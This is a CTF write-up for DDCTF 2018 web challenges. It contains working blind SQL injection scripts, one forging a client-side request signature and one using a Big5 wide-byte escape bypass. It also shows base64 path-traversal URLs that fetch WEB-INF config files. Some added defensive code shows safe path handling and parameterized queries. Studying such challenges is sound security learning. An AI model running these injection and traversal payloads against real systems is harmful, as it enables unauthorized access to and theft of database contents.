[DDctf](web) Write-up for two SQL injection challenges

Author: _Deen | Published 2018-04-20 20:49 | Read 249 times

CTF is impossible, impossible in this lifetime; all I can do is write up the sign-in-level challenges like this.

Secrets of the Database

Looking at the JS in the page source:


// signGenerate() concatenates every field as "name=value" (skipping 'sign'),
// appends the key and hashes the result with hex_math_enc() from math.js
function signGenerate(obj, key) {
  var str0 = '';
  for (var i in obj) {
    if (i != 'sign') {
      var str1 = i + '=' + obj[i];
      str0 += str1;
    }
  }
  return hex_math_enc(str0 + key);
}

var obj = {
  id: '',
  title: '',
  author: '',
  date: '',
  time: parseInt(new Date().getTime() / 1000)   // Unix timestamp in seconds
};

// Read the form fields, sign them, and submit with sig and time in the query string
function submitt() {
  obj['id'] = document.getElementById('id').value;
  obj['title'] = document.getElementById('title').value;
  obj['author'] = document.getElementById('author').value;
  obj['date'] = document.getElementById('date').value;
  var sign = signGenerate(obj, key);
  document.getElementById('queryForm').action = "index.php?sig=" + sign + "&time=" + obj.time;
  document.getElementById('queryForm').submit();
}

// The signing key is shipped to the client in the page source
var key = 'adrefkfweodfsdpiru';

So the request is signed in JS, and there is also a hidden parameter. The two other string-type parameters sit behind a WAF, so the injection has to go through the author parameter, as a boolean-based blind injection.

database() is filtered.

I am clumsy and could not port the JS hashing to Python, so I simply call the JS function directly; see the execjs library documentation for the details.

# -*-coding:utf-8-*-
__author__ = 'Deen'
import requests
import execjs
import time
from urllib.parse import unquote


def get_js():
    # Load the challenge's math.js so hex_math_enc can be called through execjs
    with open("./math.js", 'r') as f:
        return f.read()


def js_encode(payload, time_str):
    # Mirror signGenerate(): "k=v" for id, title, author, date, time (only author
    # and time are non-empty here), then the key, all hashed with hex_math_enc
    ctx = execjs.compile(get_js())
    key = 'adrefkfweodfsdpiru'
    return ctx.call('hex_math_enc', 'id=title=author=' + payload + 'date=time=' + time_str + key)


def access(payload):
    url = "http://116.85.43.88:8080/EHZTYREPPGMCQLNB/dfe3ia/index.php?"

    data = {
        "id": "",
        "title": "",
        "date": "",
        "author": "admin'&&" + payload + "#",
        "button": "search",
    }

    time_str = str(int(time.time()))
    sign = js_encode(data['author'], time_str)

    proxies = {'http': "http://127.0.0.1:8080"}  # local intercepting proxy
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Forwarded-For": "123.232.23.245"
    }

    final_url = url + 'sig=' + sign + '&time=' + time_str

    response = requests.post(final_url, data=data, headers=headers, proxies=proxies)

    # Boolean oracle: the admin row only comes back when the condition is true
    return 1 if 'admin' in response.text else 0


def get_payload(i, w):
    # Earlier stages of the enumeration, kept for reference:
    #payload = "ord(substr(((Select group_concat(table_name)fRom infOrmation_schema.tables wHere table_schema=database()))fRom " + str(i) + " fOr 1))=" + str(ord(w))+')'
    #payload = "((ord(substr((SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'

    #payload = "((ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='ddctf')fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'

    #payload = "((ord(substr((select group_concat(column_name) from information_schema.columns where table_name=0x6374665f6b657937)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'

    payload = "((ord(substr((select group_concat(secvalue) from ctf_key7)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w)) + '))'

    return payload


if __name__ == '__main__':
    dic = list("0qwertyuiopasdf{}ghjklzxcvbnm,1234567890_ABCDEFGHIJKLMNOPQRSTUVWXYZ=#$%^&*()-+!`")
    pw = ''

    # Recover the value one position at a time, trying each candidate character
    for i in range(1, 40):
        for w in dic:
            if access(unquote(get_payload(i, w))):
                pw += w
                print(pw)
                break

Database name: ddctf
Table names: ctf_key7, message
Column name: secvalue
flag: DDCTF{JQDCSEMLJCCPJRMO}

Exclusive Link

Download WEB-INF/web.xml:
http://116.85.48.102:5050//image/banner/Li4vLi4vV0VCLUlORi93ZWIueG1s
mvc-dispatcher-servlet.xml:
http://116.85.48.102:5050//image/banner/Li4vLi4vV0VCLUlORi9tdmMtZGlzcGF0Y2hlci1zZXJ2bGV0LnhtbA==

<property name="resourceLoaderPath" value="/WEB-INF/pages/"/>

Damn, too weak... could not get any further.
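The two links above decode to ../../WEB-INF/web.xml and ../../WEB-INF/mvc-dispatcher-servlet.xml, so the handler trusts a base64-encoded path. As an added example (not the challenge's or the write-up's code), this Python shows how such a handler can decode the segment and still refuse anything that escapes the banner directory; the base directory is a constructed placeholder.

```python
# Added example: a handler for /image/banner/<base64> that refuses to leave
# its directory. The write-up's links decode to ../../WEB-INF/... paths.
import base64
import binascii
from pathlib import PurePosixPath

BANNER_ROOT = PurePosixPath("/srv/app/static/image/banner")  # constructed


def decode_segment(segment: str) -> str:
    """Base64-decode one path segment; the links above omit '=' padding,
    so restore it, and reject anything that is not base64 / UTF-8."""
    padded = segment + "=" * (-len(segment) % 4)
    return base64.b64decode(padded, validate=True).decode("utf-8")


def resolve_banner(segment: str):
    """Return the file path under BANNER_ROOT, or None when the decoded
    value is absolute, empty, has a NUL byte or contains a '..' component.

    Purely lexical, so the decision does not depend on what exists on disk."""
    try:
        relative = decode_segment(segment)
    except (binascii.Error, UnicodeDecodeError):
        return None
    path = PurePosixPath(relative)
    if path.is_absolute() or not path.parts or "\x00" in relative or ".." in path.parts:
        return None
    return BANNER_ROOT.joinpath(*path.parts)


if __name__ == "__main__":
    # Constructed inputs: the write-up's web.xml link and a benign file name
    for seg in ("Li4vLi4vV0VCLUlORi93ZWIueG1s", "bG9nby5wbmc="):
        print(seg, "->", decode_segment(seg), "->", resolve_banner(seg))
```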

The Mystery of Injection

The page source shows Big5 encoding, a hint at wide-byte injection. The essence of wide-byte injection is to get the escaping backslash in front of the single quote swallowed into the preceding wide character, or to add a backslash of your own so that the escaping backslash is itself escaped.

So just go at it and fuzz:

http://116.85.48.105:5033/1f27eda8-1f66-46cd-bac5-3ada3eb7cb73/well/getmessage/%E9%Bb%a0'||%23

%E9%B1%8b'||1%23

%E9%B1%ad'||1%23
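To make the mechanism concrete, here is an added Python model (not code from the write-up or the challenge) of the server-side flaw: the application escapes the quote on raw bytes while the database decodes those bytes as Big5. It takes the three prefixes fuzzed above as constructed input and shows that only the third leaves the quote unescaped, then shows the hardened handling; the SQLite table and its contents are a constructed stand-in.

```python
# Added example: models the server-side flaw behind the wide-byte injection.
# Input bytes are escaped addslashes-style, but the database decodes them as Big5.
import sqlite3


def escape_bytes(raw: bytes) -> bytes:
    """addslashes-style escaping on raw bytes: the weak pattern."""
    return raw.replace(b"\\", b"\\\\").replace(b"'", b"\\'")


def quote_survives(raw: bytes) -> bool:
    """True if an unescaped quote remains once the DB decodes the bytes.

    Big5 trail bytes span 0x40-0x7E and 0xA1-0xFE, so the inserted
    backslash (0x5C) can become the trail byte of the preceding lead byte.
    """
    try:
        text = escape_bytes(raw).decode("big5")
    except UnicodeDecodeError:
        return False  # not valid Big5: counts as a failed probe, not a bypass
    return "'" in text and "\\'" not in text


def safe_decode(raw: bytes) -> str:
    """Hardened step 1: decode with the declared charset before escaping,
    so a lone lead byte in front of the quote is rejected, not glued."""
    return raw.decode("big5", errors="strict")


def lookup_parameterized(name: str) -> list:
    """Hardened step 2: bind the value instead of splicing it into SQL.
    The in-memory table is a constructed stand-in for the challenge DB."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE message(name TEXT, body TEXT)")
    con.execute("INSERT INTO message VALUES ('test', 'hello')")
    rows = con.execute("SELECT body FROM message WHERE name = ?", (name,)).fetchall()
    con.close()
    return [body for (body,) in rows]


if __name__ == "__main__":
    # Constructed probes: the three prefixes fuzzed in the write-up, each + '
    for probe in (b"\xe9\xbb\xa0'", b"\xe9\xb1\x8b'", b"\xe9\xb1\xad'"):
        print(probe, quote_survives(probe))  # only the last one leaves ' bare
    try:
        safe_decode(b"\xe9\xb1\xad'")
    except UnicodeDecodeError as e:
        print("rejected:", e.reason)
    print(lookup_parameterized("test' OR '1'='1"))  # []: bound as plain data
```

In a real MySQL-backed application the counterpart of safe_decode() is a charset-aware escaper, i.e. a connection charset set to the one the data actually uses; bound parameters, as in lookup_parameterized(), remove the dependency on escaping altogether.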


Start the blind injection; the script is below.

database() is filtered, and so are the greater-than and less-than signs.

# -*-coding:utf-8-*-
__author__ = 'Deen'
import requests
from urllib.parse import unquote


def access(payload):
    # Wide-byte prefix (see above) so the escaped quote survives; the condition
    # is wrapped in (...) and the rest of the query is commented out with #
    url = "http://116.85.48.105:5033/1f27eda8-1f66-46cd-bac5-3ada3eb7cb73/well/getmessage/%E9%B1%ad'||("

    proxies = {'http': "http://127.0.0.1:8080"}  # local intercepting proxy
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
        "Content-Type": "application/x-www-form-urlencoded",
    }

    full_url = url + payload + ")%23"

    response = requests.get(full_url, headers=headers, proxies=proxies)

    # Boolean oracle: "test" appears in the page only when the condition holds
    return 1 if "test" in response.text else 0


def get_payload(i, w):
    # Earlier stages of the enumeration, kept for reference (results noted inline):
    #payload = "ord(substr(((Select group_concat(table_name)fRom infOrmation_schema.tables wHere table_schema=database()))fRom " + str(i) + " fOr 1))=" + str(ord(w))+')'
    #payload = "((ord(substr((SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'  # sqli

    #payload = "((ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x73716c69)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'  # message,route_rules  (6d657373616765  726f7574655f72756c6573)

    #payload = "((ord(substr((select group_concat(column_name) from information_schema.columns where table_name=0x6d657373616765)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'  # id,pattern,action,rulepass

    payload = "((ord(substr((select group_concat(action) from route_rules)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w)) + '))'

    return payload


if __name__ == '__main__':
    dic = list("0qwertyuiopasdfghjklzxcvbnm,1234567890_ABCDEFGHIJKLMNOPQRSTUV{}WXYZ=#$%^&*()-+!`")
    pw = ''

    # Equality test per character, since < and > are filtered
    for i in range(30, 100):
        for w in dic:
            if access(unquote(get_payload(i, w))):
                pw += w
                print(pw)
                break

No flag in the database; there is a route table, so it is probably another find-the-path thing. Bored, too weak, not going on.

I remembered I once wrote a crappy script for this kind of blind injection; with a few tweaks it works here.


GitHub address (it is rough, please go easy on me): https://github.com/deenrookie/fff-sqli


Comments

  • c2fe1a8df7cc:python fffsqli.py -u "http://ctf5.shiyanbar.com/web/index_3.php"; --prefix "'||" --suffix "||'" --keywords "Hello" --tables 1 --way 1
    ###########################################################################
    # #
    # #
    # --=[ Version 1.0 coded by Deen ]=-- #
    # #
    ###########################################################################
    [ Info ] The fffsqli has start ...
    [ Info ] The datas you query: select group_concat(table_name) from information_schema.tables where table_schema=database()
    [ Info ] The payload: ((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())from({}))))<{})
    Traceback (most recent call last):
    File "fffsqli.py", line 557, in <module>
    tamper, proxies, sub, headers, data)
    File "fffsqli.py", line 501, in exploit
    html = GET_attack(full_url, cookies, proxies, headers)
    File "fffsqli.py", line 249, in GET_attack
    proxies = {"http": proxy, "https": proxy.replace('http', 'https'), }
    AttributeError: 'NoneType' object has no attribute 'replace'

    Is fffsqli broken now?
    _Deen: @Evi1ran The proxy handling has a type error; you can just delete those few functions. I have forgotten the e-mail and password for that GitHub account......
    c2fe1a8df7cc: @_Deen Traceback (most recent call last):
    File "fffsqli.py", line 560, in <module>
    tamper, proxies, sub, headers, data)
    File "fffsqli.py", line 504, in exploit
    html = GET_attack(full_url, cookies, proxies, headers)
    File "fffsqli.py", line 269, in GET_attack
    print color_print('r', " [ Error ] ") + color_print('b', "proxies: ") + color_print('lgray', proxy)
    File "fffsqli.py", line 24, in color_print
    text = gray + text + color_end
    TypeError: cannot concatenate 'str' and 'NoneType' objects

    Still not working 😓
    _Deen: @Evi1ran It should work; what you have is garbled encoding, but since only the comments are garbled it should be fine. The error below is because I added a proxy while testing; just delete the proxy line in the request and the parts that modify the proxy.
  • ckj123: Why urllib.unquote?
    _Deen: @ckj123 On an earlier challenge my script got URL-encoded and broke, so I got into the habit of decoding once. Here it should not matter; you can check with a packet capture.
  • IT人故事会: Thanks so much, I learned a lot!


Article link: https://www.haomeiwen.com/subject/sxgzkftx.html